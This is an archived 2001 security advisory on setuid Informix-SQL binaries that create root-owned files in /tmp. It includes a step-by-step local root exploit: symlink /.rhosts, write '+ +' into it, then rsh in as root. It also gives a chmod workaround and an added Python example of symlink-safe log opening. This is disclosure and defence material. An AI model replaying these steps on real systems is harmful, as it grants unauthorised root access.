OSEC

From: s96192ce.hannam.ac.kr
Date: Tue Sep 04 2001 - 08:18:47 CDT

    ==============================================================================

           [ Hackerslab bug_paper ] Informix-SQL application vulnerability

    ==============================================================================

    File : Informix-SQL application

    SYSTEM : Systems running Informix

    INFO :

    There is a vulnerability in the Informix-SQL application which allows local
    users to create any file with root privileges:

    PART 1 :
    $ id
    uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
    $ umask 0000
    $ cd ~informix/bin (Informix HOME Directory)
    $ ./onshowaudit
    INFORMIX-SQL Version 7.31.UC5
    $ ls -al onbar_d ondblog onsmsync onsrvapd
    -rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
    -rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
    -rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
    -rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd

    $ ./onbar_d or ./ondblog or ./onsmsync
    $ ls -al /tmp/bar*
    -rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
    -rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log

    PART 2:
    $ ./onsrvapd
    $ ls -al /tmp/ons*
    -rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
    -rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log

    PART 3:

    $ ./snmpdm
    $ ls -al /tmp/snmpd.log
    -rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log

    PART 4:
    loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
    loveyou@dogfoot$ ~informix/bin/onsrvapd &
    loveyou@dogfoot$ ls -al /.rhosts
    -rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
    loveyou@dogfoot$ echo "+ +" > /.rhosts
    loveyou@dogfoot$ rsh -l root localhost csh -i
    # whoami
    root

    SOLUTION :

    Remove the setuid permission, then contact your vendor and get a patch.
    (The setuid bit belongs to the owner class, so it is cleared with u-s;
    o-s has no effect on it.)
    $ su -
    # cd ~informix/bin (Informix HOME Directory)
    # chmod u-s onbar_d ondblog onsmsync onsrvapd
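    The chmod above is the administrator's workaround. The developer-side
    fix for the pattern shown in PARTs 1-4 (a privileged program writing a
    log with a predictable name into a world-writable directory) is to open
    the log without following symlinks and to verify what was actually
    opened. The script below is an added example written for this archive
    page, not code from Hackerslab or from Informix. It rebuilds the scenario
    in a scratch directory with constructed file names (no /tmp, no
    /.rhosts), shows that a naive open() follows a planted link, and shows a
    hardened open that refuses it. The function names open_log_safely and
    run_demo are assumptions of this example.

```python
import errno
import os
import shutil
import stat
import tempfile


def open_log_safely(path: str) -> int:
    """Open or create a log file in a directory other users can write to.

    O_NOFOLLOW makes the kernel refuse a symlink at the final path component
    (open fails with ELOOP), so a planted link cannot redirect the write.
    The fstat checks afterwards cover what O_NOFOLLOW does not: a hard link
    to someone else's file (st_nlink > 1) or a file pre-created by another
    user (st_uid mismatch). Newly created files get mode 0600 so no other
    user can read or append to the daemon's log.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise OSError(errno.EPERM, "not a regular file", path)
        if st.st_nlink != 1:
            raise OSError(errno.EPERM, "unexpected hard link count", path)
        if st.st_uid != os.geteuid():
            raise OSError(errno.EPERM, "log file owned by another user", path)
    except BaseException:
        os.close(fd)
        raise
    return fd


def run_demo() -> dict:
    """Rebuild the advisory's scenario in a scratch directory (constructed
    names, not /tmp and not /.rhosts) and compare a naive open() with the
    hardened open_log_safely()."""
    workdir = tempfile.mkdtemp(prefix="onsnmp-demo-")
    try:
        target = os.path.join(workdir, "protected-file")  # stands in for the file the link points at
        link = os.path.join(workdir, "onsnmp.host.log")   # the predictable log name from the advisory
        with open(target, "w"):
            pass
        os.symlink(target, link)

        # Naive pattern, as the advisory describes: open() follows the symlink,
        # so the log line lands in the target file instead of the log.
        with open(link, "a") as f:
            f.write("log line from privileged process\n")
        with open(target) as f:
            naive_followed_symlink = f.read() == "log line from privileged process\n"

        # Hardened pattern: the symlink is rejected before anything is written.
        try:
            os.close(open_log_safely(link))
            hardened_refused_symlink = False
        except OSError as exc:
            hardened_refused_symlink = exc.errno == errno.ELOOP

        # With no link in the way, the hardened open creates a private regular file.
        fd = open_log_safely(os.path.join(workdir, "fresh.log"))
        st = os.fstat(fd)
        os.close(fd)
        hardened_created_private_file = (
            stat.S_ISREG(st.st_mode)
            and st.st_nlink == 1
            and stat.S_IMODE(st.st_mode) & 0o077 == 0
        )
    finally:
        shutil.rmtree(workdir, ignore_errors=True)

    return {
        "naive_followed_symlink": naive_followed_symlink,
        "hardened_refused_symlink": hardened_refused_symlink,
        "hardened_created_private_file": hardened_created_private_file,
    }


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name}: {ok}")
```

    The stronger fix is not to write privileged logs into a shared directory
    at all: a directory owned by the daemon's user with mode 0700, or logging
    through syslog, removes the race entirely, and the open-time checks above
    then act as defence in depth.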

    ==-------------------------------------------------------------------------------==
           ********
       * ** ** *
     * ** ** *
    * ****** * Kim Yong-Jun
     * ** ** * loveyou@hackerslab.org
       * ** ** * [ http://www.hackerslab.org ]
           ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==